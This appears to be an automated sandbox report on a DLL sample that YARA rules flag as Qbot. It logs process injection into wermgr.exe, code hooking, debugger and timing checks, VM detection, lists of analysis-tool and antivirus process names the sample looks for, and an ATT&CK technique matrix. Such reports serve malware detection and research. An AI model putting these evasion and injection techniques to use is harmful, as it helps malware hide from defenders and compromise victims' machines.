Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6712

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: F086.dll

Static PE information: More than 582 > 100 exports found

Source: F086.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress,

3_2_1001F523

Source: F086.dll

Static PE information: real checksum: 0xf1b7b should be: 0xee8fa

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: PID: 5752 base: 1083C50 value: E9 63 D7 F2 FF

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: wermgr.exe, 00000018.00000003.517941844.0000000007060000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BEHAVIORDUMPER.EXE
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXEN
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSANALYZER.EXEG
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IMPORTREC.EXE~
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXEW
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: wermgr.exe, 00000018.00000003.517941844.0000000007060000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROC_ANALYZER.EXE
Source: wermgr.exe, 00000018.00000003.517941844.0000000007060000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SNIFF_HIT.EXE
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXEO
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SNIFF_HIT.EXEU
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE[
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXEV
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXEA
Source: wermgr.exe, 00000018.00000003.517941844.0000000007060000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDAQ.EXE
Source: wermgr.exe, 00000018.00000003.517941844.0000000007060000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE

Source: C:\Windows\SysWOW64\rundll32.exe TID: 5496	Thread sleep count: 191 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe TID: 4120	Thread sleep time: -75000s >= -30000s

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_18-12981

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_10035030 rdtsc

3_2_10035030

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_18-11917

Source: C:\Windows\SysWOW64\wermgr.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_041BB883 GetSystemInfo,

18_2_041BB883

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_041B9DA8 FindFirstFileW,FindNextFileW,

18_2_041B9DA8

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: Amcache.hve.9.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_10035030 Start: 10035315 End: 1003515E

3_2_10035030

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress,

3_2_1001F523

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_10035030 rdtsc

3_2_10035030

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001E0D9 mov eax, dword ptr fs:[00000030h]	3_2_1001E0D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041B1015 mov eax, dword ptr fs:[00000030h]	18_2_041B1015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041B21CD mov eax, dword ptr fs:[00000030h]	18_2_041B21CD

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: FE0000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: FB0000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1083C50	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: FB0000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: FE0000 protect: page read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: C:\Windows\SysWOW64\wermgr.exe base: FB0000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",#1			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wermgr.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_041BC2D1 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

18_2_041BC2D1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_10092180 GetTimeZoneInformation,GetModuleHandleA,GetProcAddress,

3_2_10092180

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_041BBB4D GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW,

18_2_041BBB4D

Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bdagent.exe
Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: rundll32.exe, 00000012.00000003.499075306.000000000439F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Qbot

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 18.2.rundll32.exe.280c00.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.41b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.280c00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.508131058.000000000026A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.508336162.0000000004320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Qbot

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 18.2.rundll32.exe.280c00.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.41b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.280c00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.508131058.000000000026A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.508336162.0000000004320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 Credential API Hooking	2 System Time Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	21 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	1 Input Capture	131 Security Software Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Rundll32	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
